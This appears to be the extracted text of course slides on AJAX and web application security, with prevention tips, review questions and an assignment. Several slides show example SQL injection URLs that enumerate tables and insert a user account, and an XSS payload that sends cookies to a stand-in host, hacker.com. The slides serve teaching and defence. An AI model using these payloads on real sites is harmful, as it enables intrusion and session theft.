2. AJAX - what & why?
Asynchronous
Javascript and XML
Why? Improve performance
To avoid postback -
saves page re-loading
time
Transfer smaller
amount of data across
network
Example: select year,
make, model
7. Web Attack - Parameter manipulation
/student/details/1000 change to 1001?
SQL Injection
query = "select product_name from product where
product_id=" + PID
PID comes from web parameter:
http://myweb.com/product.aspx?PID=1
http://myweb.com/product.aspx?PID=1;union select
name from sysobjects where xtype='U'
Hackers add himself to the Users table
http://myweb.com/product.aspx?PID=1; insert into
Users (uname, pword) values ('hacker', 'hacked')
8. Web Attack – cross site scripting (XSS)
Once you comprise the database, insert javascript
into the tables
product.description =
,'<script>document.location='http://hacker.com/collect
or.html? cookie='+document.cookie</script>
Hacker now knows your cookie when the content is
rendered.
Danger of cross site scripting
Contents of the current document cookie is sent off to
hacker.com
Session IDs and authentication tokens are commonly
stored in cookies
Javascript can log key strokes
9. Web Attack - Prevention
Remove all SQL Injection code
HTML-Encode all data displayed to prevent XSS
Treat any input as potential threat
user can enter javascript in textbox and textarea
Use validation on the server (user could disable javascript
error checking on browser)
Encrypt cookies
user_id="100" // No
user_id="CQZJU-VQRQF-LAWFI-HGCPL-MTNTS-
JYOPD-TIJYV-INMYJ-TVLLC-RWJOT-CTHAM-GJQHD"
Upload Files:
Email attachment
Business documents
Servers should run Virus checker on all uploaded files
10. Web Attack and AJAX
The methods of a
Web service are
analogous to the
form inputs of a Web
application.
They are easy to
find, easy to attack
WSDL is now open to
public (example data
often provided)
12. Web Attack - white vs. black
Exposed BL domain model
13. Web Attack - Ajax security mistakes
Solution:
Use cookie at the WEB web-service
14. Web Attack - Securing Ajax server
Install validation filter
Use Regular
Expression to validate
input strings
Use Regular
Expression to remove
"attack" characters: <
& />, etc
Validate user thru
cookies/sessions
(WEB web-services)
15. Review question
Is ajax synchronous or asynchronous?
Why used ajax?
Is ajax architecture more secured or less?
What is XSS?
Difference between white box and black box?
16. Your assignment
Complete your MVC project with test cases
Project due next Thursday
17. Lab
Due: Grade your middle tier and test cases
18. References
.NET : Architecting Applications for the
Enterprise
Ajax Security